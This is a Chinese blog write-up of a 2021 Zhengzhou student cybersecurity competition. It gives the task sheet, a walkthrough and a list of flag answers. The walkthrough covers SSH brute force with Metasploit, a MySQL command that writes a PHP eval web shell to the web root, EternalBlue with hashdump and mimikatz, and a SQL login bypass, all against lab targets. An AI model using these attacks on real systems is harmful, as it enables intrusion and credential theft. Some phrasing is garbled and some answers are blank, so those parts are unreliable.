2021全国职业技能大赛郑州市“网络空间安全赛项”赛题及赛题解析(超详细)
2021年中职组“网络空间安全”赛项
- 本次郑州市竞赛任务书
- 对本次竞赛任务书中相关问题进行详细解析
- 对《郑州市竞赛任务书》中的解答方案进行深入分析
- 有疑问的朋友可以直接联系我
一.郑州市竞赛任务书
一、竞赛时间
8:00—11:00 共计3小时
二、竞赛阶段
竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值
第①阶段:
单兵模式系统渗透测试
任务一:
SSH弱口令渗透测试
任务二:
Linux操作系统渗透测试
任务三:
服务器内部信息获取
任务四:
Windows操作系统渗透测试
任务五:
Linux操作系统渗透测试
任务六:
Web安全之综合渗透测试
备战阶段 休息20分钟
第②阶段:
分组对抗 系统加固 15分钟
渗透测试 45分钟
三、竞赛任务书内容
(一)拓扑图
(二)第一阶段任务书
任务一:SSH弱口令渗透测试
任务环境说明:
服务器场景:Linux(关闭链接)
服务器场景操作系统:Linux(版本不详)
1.在本地PC渗透测试平台BT5中使用zenmap工具扫描服务器场景Linux所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、23端口。并将该操作使用的命令中必须要添加的字符串作为FLAG提交(忽略ip地址);
2.通过本地PC中渗透测试平台BT5对服务器场景Linux进行系统服务及版本扫描渗透测试,并将该操作显示结果中SSH服务对应的服务端口信息作为FLAG提交;
3.在本地PC渗透测试平台BT5中使用MSF模块对其爆破,使用search命令,并将扫描弱口令模块的名称信息作为FLAG提交;
4.在上一题的基础上使用命令调用该模块,并查看需要配置的信息(使用show options命令),将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交(之间以英文逗号分隔,例hello,test,…,…);
5.在msf模块中配置目标靶机IP地址,将配置命令中的前两个单词作为FLAG提交;
6.在msf模块中指定密码字典,字典路径为/桌面/tools/2.txt,用户名为test爆破获取密码并将得到的密码作为FLAG提交;
7.在上一题的基础上,使用第6题获取到的密码SSH到靶机,将test用户家目录中唯一一个后缀为.bmp图片的文件名的字符串作为FLAG提交。
任务二:Linux 渗透测试
任务三:服务器内部信息获取
任务四:Windows操作系统渗透测试
任务五:Linux2操作系统渗透测试
任务六:Web安全之综合渗透测试-2
二.任务书解析
任务一:
1.根据他题目我们直接可以得到命令 -p 21,22,23

1.SSH的端口配置参数设置为SS:22(tcp)
2.调用模块auxiliary中的函数auxiliary/scanner/ssh/ssh_login进行ssho攻击
3.配置必要的环境变量参数如下:RHOSTS指定远程主机列表;PASS_FILE指定权限文件路径;THREADS设定最大线程数;USERNAME指定用户名。

5. set RHOSTS 设置目标主机
6. exploit 运行

7.知道密码以后ssh连接目标靶机

任务二:
1.使用nmap -sV 扫码看开了什么端口

2.思路①:暴力破解数据库密码


随后登录数据库并尝试上传一段木马代码:select '<?php @eval($_POST[“cmd”])?>' into outfile '/var/www/html/log.php'; 这段代码的作用是将请求中的PHP脚本执行并存储到指定位置;其中日志文件路径'/var/www/html/log.php'可以任意指定


只要渗透进来了后面的题目都可以做了这里就不一一叙述了。
任务三:
不太会所以就没写
任务四:
1.nmap -sV

通过永 blue 模块完成正确配置后,在其中触发 explore 任务以执行相应操作。


运行getgui进程并指定端口3389启动该服务。通过调用hashdump命令获取相应的密文内容。在尝试利用彩虹表进行密码破解却未能成功的情况下(感到有些尴尬),则建议采用mimikatz工具先加载kerberos机制来获取相应的密钥信息。

rdesktop 直接连接目标靶机 然后下面所有的题目都可以做了。


任务五:
思路①:首先利用数据库中的login模块获取目标数据库的密码信息,默认情况下该密码存储在kali2.0环境下的字典文件2.txt中(该字典已作为附带文件上传)。随后通过连接到该数据库并注入一句话木马程序(类似于Linux中的select '<?php @eval($_POST[“cmd”])?>' into outfile '/var/www/html/log.php';)进行后续操作即可完成任务目标select '<?php @eval($_POST[“cmd”])?>' into outfile '/var/www/html/log.php';后的log.php文件路径可自行指定
思路②:然而针对后续问题无法直接解决的原因在于权限限制导致无法访问关键系统资源(如etc/passwd文件)。推测目标目录下存在与普通用户相同的子目录结构(如包含多个"User"级别的子目录),因此可以通过SSH工具执行暴力破解操作并获取相应用户的密码信息(仍基于字典2.txt)。由于当前环境下缺乏足够的权限访问/etc/passwd等核心配置文件(如需访问需root权限),建议尝试利用nmap -p命令进行端口扫描以寻找可能存在的高端服务端口(具体实现细节可私信交流)。若发现无可用高端口,则转而专注于root账户密码的爆破攻击!
任务六:
1.访问第一个网页 加减法的 直接F12 看js代码

2.vim编辑器

3.robots 机器人 直接访问flag.php 就得到flag


4.就是个传参的web题目 在url 里面id/?id=flag

5.万能密码登入 ' or '1'='1

6. 只允许ip172.16.1.100的地址访问


三.任务书答案
任务一:
①flag: -p 21,22,23
②flag:22/tcp
③flag:auxiliary/scanner/ssh/ssh_login
④flag:RHOSTS,PASS_FILE,THREADS,USERNAME
⑤flag:set RHOSTS
⑥flag:aaabc3
⑦flag:nauiwrevy
任务二:
①flag:MySQL 5.1.73-log
②flag:loginmanager
③flag:slkrvung
④flag:vmifeo
⑤flag:glamorous
任务三:
这题没环境不太会,会的话可以私信和我交流一下
任务四:
①flag:Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
②flag:121.212.121.212
③flag:P@ssw0rd
④flag:flag123456789.docx
⑤flag:846548795432
⑥flag:anonymous
任务五:
①flag:wuslwczr
②flag:gutldhan
③flag:bmqfldne
④flag:tywajsfk
⑤flag:ureansma
⑥flag:jtluqwtr
⑦flag:
⑧flag:
任务六:
①flag:flag{htmlcode}
②flag:flag{vimbakswp}
③flag:flag{spider}
④flag:flag{sqlinject1}
⑤flag:flag{wannengpwd}
⑥flag:flag{ipsrc}
四.不懂的可以私信博主!
如对环境或题目有任何疑问,请随时通过私信联系博主;如有不懂的问题细节,请提供具体说明以便更好地帮助您。感谢大家的喜爱与支持!如需帮助,请您三连击(按住Shift+Enter三键)。
